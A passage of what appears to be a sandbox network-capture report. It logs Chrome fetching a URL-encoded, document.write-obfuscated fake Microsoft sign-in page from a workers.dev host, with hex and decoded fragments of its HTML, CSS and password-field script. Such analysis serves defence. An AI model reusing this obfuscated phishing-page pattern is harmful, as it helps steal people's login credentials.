er-bottom%3A%201px%20solid%20%23999%3B%0A%20%20width%3A%20100%25%3B%0A%20%20padding%3A%205px%3B%0A%20%20font-size%3A%2016px%3B%0A%20%20outline%3A%20none%3B%0A%7D%0A.formal%7B%0A%20%20background%3A%20%23fff%3B%0A%20%20width%3A%2025%25%3B%0A%20%20margin%3A%
2024-04-28 23:11:40 UTC	1369	IN	Data Raw: 32 30 25 32 30 77 69 64 74 68 25 33 41 25 32 30 33 32 70 78 25 33 42 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 68 65 69 67 68 74 25 33 41 25 32 30 33 33 70 78 25 33 42 25 30 41 25 37 44 25 30 41 2e 6f 70 74 69 6f 6e 73 25 37 42 25 30 41 25 32 30 25 32 30 62 61 63 6b 67 72 6f 75 6e 64 25 33 41 25 32 30 25 32 33 66 66 66 25 33 42 25 30 41 25 32 30 25 32 30 77 69 64 74 68 25 33 41 25 32 30 33 30 25 32 35 25 33 42 25 30 41 25 32 30 25 32 30 6d 61 72 67 69 6e 25 33 41 25 32 30 61 75 74 6f 25 33 42 25 30 41 25 32 30 25 32 30 6d 61 72 67 69 6e 2d 74 6f 70 25 33 41 25 32 30 32 25 32 35 25 33 42 25 30 41 25 32 30 25 32 30 62 6f 78 2d 73 68 61 64 6f 77 25 33 41 30 25 32 30 32 70 78 25 32 30 36 70 78 25 32 30 72 67 62 25 32 38 30 25 32 30 30 25 32 30 30 25 32 30 Data Ascii: 20%20width%3A%2032px%3B%0A%20%20%20%20height%3A%2033px%3B%0A%7D%0A.options%7B%0A%20%20background%3A%20%23fff%3B%0A%20%20width%3A%2030%25%3B%0A%20%20margin%3A%20auto%3B%0A%20%20margin-top%3A%202%25%3B%0A%20%20box-shadow%3A0%202px%206px%20rgb%280%200%200%20
2024-04-28 23:11:40 UTC	1369	IN	Data Raw: 6f 67 6f 5f 65 65 35 63 38 64 39 66 62 36 32 34 38 63 39 33 38 66 64 30 64 63 31 39 33 37 30 65 39 30 62 64 2e 73 76 67 25 32 32 25 32 30 61 6c 74 25 33 44 25 32 32 25 32 32 25 33 45 25 30 41 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 64 69 76 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 73 69 67 6e 25 32 32 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 70 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 6d 61 69 6c 25 32 32 25 33 45 25 33 43 2f 70 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 68 31 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 73 69 6e 25 32 32 25 33 45 53 69 67 6e Data Ascii: ogo_ee5c8d9fb6248c938fd0dc19370e90bd.svg%22%20alt%3D%22%22%3E%0A%0A%20%20%20%20%20%20%20%20%3Cdiv%20class%3D%22sign%22%3E%0A%20%20%20%20%20%20%20%20%20%20%3Cp%20class%3D%22mail%22%3E%3C/p%3E%0A%20%20%20%20%20%20%20%20%20%20%3Ch1%20class%3D%22sin%22%3ESign
2024-04-28 23:11:40 UTC	1369	IN	Data Raw: 32 30 74 79 70 65 25 33 44 25 32 32 25 32 32 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 6e 65 78 74 25 32 32 25 33 45 4e 65 78 74 25 33 43 2f 62 75 74 74 6f 6e 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 62 75 74 74 6f 6e 25 32 30 74 79 70 65 25 33 44 25 32 32 25 32 32 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 70 65 73 74 25 32 32 25 33 45 4e 65 78 74 25 33 43 2f 62 75 74 74 6f 6e 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 2f 64 69 76 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 62 72 25 33 45 25 33 43 62 72 25 33 45 25 33 43 62 72 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 Data Ascii: 20type%3D%22%22%20class%3D%22next%22%3ENext%3C/button%3E%0A%20%20%20%20%20%20%20%20%20%20%3Cbutton%20type%3D%22%22%20class%3D%22pest%22%3ENext%3C/button%3E%0A%20%20%20%20%20%20%20%20%3C/div%3E%0A%20%20%20%20%20%20%20%20%3Cbr%3E%3Cbr%3E%3Cbr%3E%0A%20%20%20
2024-04-28 23:11:40 UTC	1369	IN	Data Raw: 38 25 32 37 2e 6d 61 69 6c 25 32 37 25 32 39 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 63 6f 6e 73 74 25 32 30 6e 6f 61 63 63 25 32 30 25 33 44 25 32 30 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 25 32 38 25 32 37 2e 6e 6f 61 63 63 63 25 32 37 25 32 39 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 63 6f 6e 73 74 25 32 30 63 72 65 61 74 25 32 30 25 33 44 25 32 30 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 25 32 38 25 32 37 2e 63 72 65 61 74 25 32 37 25 32 39 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 63 6f 6e 73 74 25 32 30 62 75 74 74 25 32 30 25 33 44 25 32 30 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 25 32 38 25 32 37 2e 6e 65 Data Ascii: 8%27.mail%27%29%0A%20%20%20%20%20%20const%20noacc%20%3D%20document.querySelector%28%27.noaccc%27%29%0A%20%20%20%20%20%20const%20creat%20%3D%20document.querySelector%28%27.creat%27%29%0A%20%20%20%20%20%20const%20butt%20%3D%20document.querySelector%28%27.ne
2024-04-28 23:11:40 UTC	1369	IN	Data Raw: 25 32 30 70 77 64 2e 73 74 79 6c 65 2e 6f 70 61 63 69 74 79 25 32 30 25 33 44 25 32 30 31 30 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 37 44 25 32 39 25 30 41 25 30 41 25 32 30 25 32 30 62 75 74 74 41 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 25 32 38 25 32 37 63 6c 69 63 6b 25 32 37 25 32 43 25 32 30 25 32 38 25 32 39 25 33 44 25 33 45 25 37 42 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 7a 69 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 25 32 30 25 33 44 25 32 30 25 32 37 62 6c 6f 63 6b 25 32 37 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 7a 69 70 2e 73 74 79 6c 65 2e 6f 70 61 63 69 74 79 25 32 30 25 33 44 25 32 30 31 30 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 Data Ascii: %20pwd.style.opacity%20%3D%2010%0A%20%20%20%20%20%20%7D%29%0A%0A%20%20buttA.addEventListener%28%27click%27%2C%20%28%29%3D%3E%7B%0A%20%20%20%20zip.style.display%20%3D%20%27block%27%0A%20%20%20%20zip.style.opacity%20%3D%2010%0A%20%20%20%20%20%20%20%20%20%20
2024-04-28 23:11:40 UTC	360	IN	Data Raw: 32 30 25 32 30 25 32 30 25 32 30 25 37 44 25 32 43 25 32 30 65 72 72 6f 72 25 32 30 25 33 44 25 33 45 25 32 30 25 37 42 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 61 6c 65 72 74 25 32 38 25 32 32 4d 65 73 73 61 67 65 25 32 30 6e 6f 74 25 32 30 73 65 6e 74 25 32 32 25 32 39 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 25 32 38 65 72 72 6f 72 25 32 39 25 30 41 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 37 44 25 32 39 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 Data Ascii: 20%20%20%20%7D%2C%20error%20%3D%3E%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20alert%28%22Message%20not%20sent%22%29%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20console.log%28error%29%0A%0A%20%20%20%20%20%20%20%20%20%20%7D%29%0A%20%20%20%20%20%20%20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49759	13.107.246.51	443	5840	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-28 23:11:40 UTC	418	OUT	GET /shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1 Host: aadcdn.msauth.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-28 23:11:40 UTC	806	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:11:40 GMT Content-Type: image/svg+xml Content-Length: 1435 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Fri, 17 Jan 2020 19:28:38 GMT ETag: 0x8D79B8373CB2849 x-ms-request-id: d73a97a8-101e-0007-4cb6-983490000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240428T231140Z-17f6c5785f4n92z7ptxyzykk680000000c100000000002nn x-fd-int-roxy-purgeid: 4554691 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-04-28 23:11:40 UTC	1435	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12 24 b5 5d 68 a5 Data Ascii: WMo7+uVHJ{&v(QFaWQ\|~\|{~b{8zv8\|bgxby{x<\lSppl7o}vtrr\|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#$]h

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49760	13.107.246.51	443	5840	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-28 23:11:40 UTC	418	OUT	GET /shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg HTTP/1.1 Host: aadcdn.msauth.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-28 23:11:41 UTC	785	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:11:41 GMT Content-Type: image/svg+xml Content-Length: 621 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Tue, 10 Nov 2020 03:41:24 GMT ETag: 0x8D8852A7FA6B761 x-ms-request-id: c7575ef3-801e-0042-79c1-99608b000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240428T231140Z-17f6c5785f4vh6bxh9czqnv2t40000000b2g0000000046vn x-fd-int-roxy-purgeid: 4554691 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-04-28 23:11:41 UTC	621	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 7d 55 4d 6f 22 31 0c fd 2b a3 d9 ab 93 c9 f7 47 3b 20 cd 9e 38 6c af 1c b8 4d 0b 05 24 0a 55 19 41 57 ab fe f7 b5 93 a0 55 61 58 0d d8 60 27 ef 3d db 09 b4 c7 d3 ba fa 7c db ed 8f 93 7a 33 0c ef 0f 4d 73 3e 9f f9 59 f3 c3 c7 ba 51 42 88 06 57 d4 d5 79 bb 1c 36 93 da 84 ba da ac b6 eb cd 90 3f 9f b6 ab f3 cf c3 e7 a4 16 95 a8 4c c0 57 3d 6d 97 ab d7 e3 b4 3d 0e bf 77 ab 29 ef ff bc 6e 77 bb 87 fd 61 bf 7a fc e2 cf f9 db 0f 23 e8 79 fc 6a 9b bc ac 6d f2 a6 8f d5 cb 50 bd ec fa 23 ca e9 ef b1 36 d3 f6 bd 1f 36 97 75 cf 75 b5 9c d4 4f 46 80 56 dc fa 30 37 62 a6 d5 5c bb 99 0a 73 ad 66 ca cc 55 e0 de b9 4e 0a ee 42 84 e2 04 3e 12 64 04 2d 7a 0c a5 78 89 32 cb ad f1 4c 72 0b 52 72 29 dc c5 e5 ac e2 4a 46 cc 7a 19 3b 4c 68 af a1 b8 Data Ascii: }UMo"1+G; 8lM$UAWUaX`'=\|z3Ms>YQBWy6?LW=m=w)nwaz#yjmP#66uuOFV07b\sfUNB>d-zx2LrRr)JFz;Lh

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49762	35.190.80.1	443	5840	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-28 23:11:42 UTC	480	OUT	POST /report/v4?s=OgVX3jyPtvECmYZZTxn4CexlmRXxr9CIxEf1euhWvT9YFjfmC8EvOhJKMNxQ0HCVLxPZFe4L63mudhqivV6vRFcH8sxmxW1f8t9QxiG%2Bhl8t1Gx%2BU%2Fg2h679TnbyhtSzDEMpysiH HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Content-Length: 477 Content-Type: application/reports+json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-28 23:11:42 UTC	477	OUT	Data Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 36 32 33 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 76 62 76 66 64 76 64 6a 76 76 2e 66 79 66 79 76 66 79 74 76 67 68 76 2e 77 6f 72 6b 65 72 73 2e 64 65 76 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 32 33 35 2e 31 38 31 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e Data Ascii: [{"age":0,"body":{"elapsed_time":623,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://vbvfdvdjvv.fyfyvfytvghv.workers.dev/","sampling_fraction":1.0,"server_ip":"104.21.235.181","status_code":404,"type":"http.error"},"type":"n
2024-04-28 23:11:42 UTC	168	IN	HTTP/1.1 200 OK content-length: 0 date: Sun, 28 Apr 2024 23:11:42 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49763	104.21.55.4	443	5840	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-28 23:11:42 UTC	370	OUT	GET /favicon.ico HTTP/1.1 Host: vbvfdvdjvv.fyfyvfytvghv.workers.dev Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-28 23:11:42 UTC	571	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:11:42 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 9370 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h2JaJut5edlb8kB%2BfJ76vtA7L7kaWqLXZQW30NPct5GIeTQs%2FxhjyjnafkpjxEGrnbeCBVH4cyarv7YduxFs952BJAl4TuBMgbjmrG2jqGqBKzIgKWIRgzE47W5pPu%2F2n9rz45uqKC1WkT6iLXwRqLsmb2yIAA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87babba43ca013f9-ORD alt-svc: h3=":443"; ma=86400
2024-04-28 23:11:42 UTC	798	IN	Data Raw: 0a 20 20 20 3c 3c 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 22 25 33 43 25 32 31 44 4f 43 54 59 50 45 25 32 30 68 74 6d 6c 25 33 45 25 30 41 25 33 43 68 74 6d 6c 25 33 45 25 30 41 25 32 30 25 32 30 25 33 43 68 65 61 64 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 6d 65 74 61 25 32 30 63 68 61 72 73 65 74 25 33 44 25 32 32 75 74 66 2d 38 25 32 32 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 6d 65 74 61 25 32 30 6e 61 6d 65 25 33 44 25 32 32 76 69 65 77 70 6f 72 74 25 32 32 25 32 30 63 6f 6e 74 65 6e 74 25 33 44 25 32 32 77 69 64 74 68 25 33 44 64 65 76 69 63 65 2d 77 69 64 74 68 25 32 32 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 74 Data Ascii: <<script>...document.write(unescape("%3C%21DOCTYPE%20html%3E%0A%3Chtml%3E%0A%20%20%3Chead%3E%0A%20%20%20%20%3Cmeta%20charset%3D%22utf-8%22%3E%0A%20%20%20%20%3Cmeta%20name%3D%22viewport%22%20content%3D%22width%3Ddevice-width%22%3E%0A%20%20%20%20%3Ct
2024-04-28 23:11:42 UTC	1369	IN	Data Raw: 2d 62 6f 74 74 6f 6d 25 33 41 25 32 30 31 70 78 25 32 30 73 6f 6c 69 64 25 32 30 25 32 33 39 39 39 25 33 42 25 30 41 25 32 30 25 32 30 77 69 64 74 68 25 33 41 25 32 30 31 30 30 25 32 35 25 33 42 25 30 41 25 32 30 25 32 30 70 61 64 64 69 6e 67 25 33 41 25 32 30 35 70 78 25 33 42 25 30 41 25 32 30 25 32 30 66 6f 6e 74 2d 73 69 7a 65 25 33 41 25 32 30 31 36 70 78 25 33 42 25 30 41 25 32 30 25 32 30 6f 75 74 6c 69 6e 65 25 33 41 25 32 30 6e 6f 6e 65 25 33 42 25 30 41 25 37 44 25 30 41 2e 66 6f 72 6d 61 6c 25 37 42 25 30 41 25 32 30 25 32 30 62 61 63 6b 67 72 6f 75 6e 64 25 33 41 25 32 30 25 32 33 66 66 66 25 33 42 25 30 41 25 32 30 25 32 30 77 69 64 74 68 25 33 41 25 32 30 32 35 25 32 35 25 33 42 25 30 41 25 32 30 25 32 30 6d 61 72 67 69 6e 25 33 41 25 32 30 Data Ascii: -bottom%3A%201px%20solid%20%23999%3B%0A%20%20width%3A%20100%25%3B%0A%20%20padding%3A%205px%3B%0A%20%20font-size%3A%2016px%3B%0A%20%20outline%3A%20none%3B%0A%7D%0A.formal%7B%0A%20%20background%3A%20%23fff%3B%0A%20%20width%3A%2025%25%3B%0A%20%20margin%3A%20
2024-04-28 23:11:42 UTC	1369	IN	Data Raw: 25 32 30 77 69 64 74 68 25 33 41 25 32 30 33 32 70 78 25 33 42 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 68 65 69 67 68 74 25 33 41 25 32 30 33 33 70 78 25 33 42 25 30 41 25 37 44 25 30 41 2e 6f 70 74 69 6f 6e 73 25 37 42 25 30 41 25 32 30 25 32 30 62 61 63 6b 67 72 6f 75 6e 64 25 33 41 25 32 30 25 32 33 66 66 66 25 33 42 25 30 41 25 32 30 25 32 30 77 69 64 74 68 25 33 41 25 32 30 33 30 25 32 35 25 33 42 25 30 41 25 32 30 25 32 30 6d 61 72 67 69 6e 25 33 41 25 32 30 61 75 74 6f 25 33 42 25 30 41 25 32 30 25 32 30 6d 61 72 67 69 6e 2d 74 6f 70 25 33 41 25 32 30 32 25 32 35 25 33 42 25 30 41 25 32 30 25 32 30 62 6f 78 2d 73 68 61 64 6f 77 25 33 41 30 25 32 30 32 70 78 25 32 30 36 70 78 25 32 30 72 67 62 25 32 38 30 25 32 30 30 25 32 30 30 25 32 30 2f 25 Data Ascii: %20width%3A%2032px%3B%0A%20%20%20%20height%3A%2033px%3B%0A%7D%0A.options%7B%0A%20%20background%3A%20%23fff%3B%0A%20%20width%3A%2030%25%3B%0A%20%20margin%3A%20auto%3B%0A%20%20margin-top%3A%202%25%3B%0A%20%20box-shadow%3A0%202px%206px%20rgb%280%200%200%20/%
2024-04-28 23:11:42 UTC	1369	IN	Data Raw: 6f 5f 65 65 35 63 38 64 39 66 62 36 32 34 38 63 39 33 38 66 64 30 64 63 31 39 33 37 30 65 39 30 62 64 2e 73 76 67 25 32 32 25 32 30 61 6c 74 25 33 44 25 32 32 25 32 32 25 33 45 25 30 41 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 64 69 76 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 73 69 67 6e 25 32 32 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 70 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 6d 61 69 6c 25 32 32 25 33 45 25 33 43 2f 70 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 68 31 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 73 69 6e 25 32 32 25 33 45 53 69 67 6e 25 32 Data Ascii: o_ee5c8d9fb6248c938fd0dc19370e90bd.svg%22%20alt%3D%22%22%3E%0A%0A%20%20%20%20%20%20%20%20%3Cdiv%20class%3D%22sign%22%3E%0A%20%20%20%20%20%20%20%20%20%20%3Cp%20class%3D%22mail%22%3E%3C/p%3E%0A%20%20%20%20%20%20%20%20%20%20%3Ch1%20class%3D%22sin%22%3ESign%2
2024-04-28 23:11:42 UTC	1369	IN	Data Raw: 74 79 70 65 25 33 44 25 32 32 25 32 32 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 6e 65 78 74 25 32 32 25 33 45 4e 65 78 74 25 33 43 2f 62 75 74 74 6f 6e 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 62 75 74 74 6f 6e 25 32 30 74 79 70 65 25 33 44 25 32 32 25 32 32 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 70 65 73 74 25 32 32 25 33 45 4e 65 78 74 25 33 43 2f 62 75 74 74 6f 6e 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 2f 64 69 76 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 62 72 25 33 45 25 33 43 62 72 25 33 45 25 33 43 62 72 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 Data Ascii: type%3D%22%22%20class%3D%22next%22%3ENext%3C/button%3E%0A%20%20%20%20%20%20%20%20%20%20%3Cbutton%20type%3D%22%22%20class%3D%22pest%22%3ENext%3C/button%3E%0A%20%20%20%20%20%20%20%20%3C/div%3E%0A%20%20%20%20%20%20%20%20%3Cbr%3E%3Cbr%3E%3Cbr%3E%0A%20%20%20%2
2024-04-28 23:11:42 UTC	1369	IN	Data Raw: 32 37 2e 6d 61 69 6c 25 32 37 25 32 39 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 63 6f 6e 73 74 25 32 30 6e 6f 61 63 63 25 32 30 25 33 44 25 32 30 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 25 32 38 25 32 37 2e 6e 6f 61 63 63 63 25 32 37 25 32 39 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 63 6f 6e 73 74 25 32 30 63 72 65 61 74 25 32 30 25 33 44 25 32 30 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 25 32 38 25 32 37 2e 63 72 65 61 74 25 32 37 25 32 39 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 63 6f 6e 73 74 25 32 30 62 75 74 74 25 32 30 25 33 44 25 32 30 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 25 32 38 25 32 37 2e 6e 65 78 74 Data Ascii: 27.mail%27%29%0A%20%20%20%20%20%20const%20noacc%20%3D%20document.querySelector%28%27.noaccc%27%29%0A%20%20%20%20%20%20const%20creat%20%3D%20document.querySelector%28%27.creat%27%29%0A%20%20%20%20%20%20const%20butt%20%3D%20document.querySelector%28%27.next
2024-04-28 23:11:42 UTC	1369	IN	Data Raw: 30 70 77 64 2e 73 74 79 6c 65 2e 6f 70 61 63 69 74 79 25 32 30 25 33 44 25 32 30 31 30 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 37 44 25 32 39 25 30 41 25 30 41 25 32 30 25 32 30 62 75 74 74 41 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 25 32 38 25 32 37 63 6c 69 63 6b 25 32 37 25 32 43 25 32 30 25 32 38 25 32 39 25 33 44 25 33 45 25 37 42 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 7a 69 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 25 32 30 25 33 44 25 32 30 25 32 37 62 6c 6f 63 6b 25 32 37 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 7a 69 70 2e 73 74 79 6c 65 2e 6f 70 61 63 69 74 79 25 32 30 25 33 44 25 32 30 31 30 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 Data Ascii: 0pwd.style.opacity%20%3D%2010%0A%20%20%20%20%20%20%7D%29%0A%0A%20%20buttA.addEventListener%28%27click%27%2C%20%28%29%3D%3E%7B%0A%20%20%20%20zip.style.display%20%3D%20%27block%27%0A%20%20%20%20zip.style.opacity%20%3D%2010%0A%20%20%20%20%20%20%20%20%20%20%2
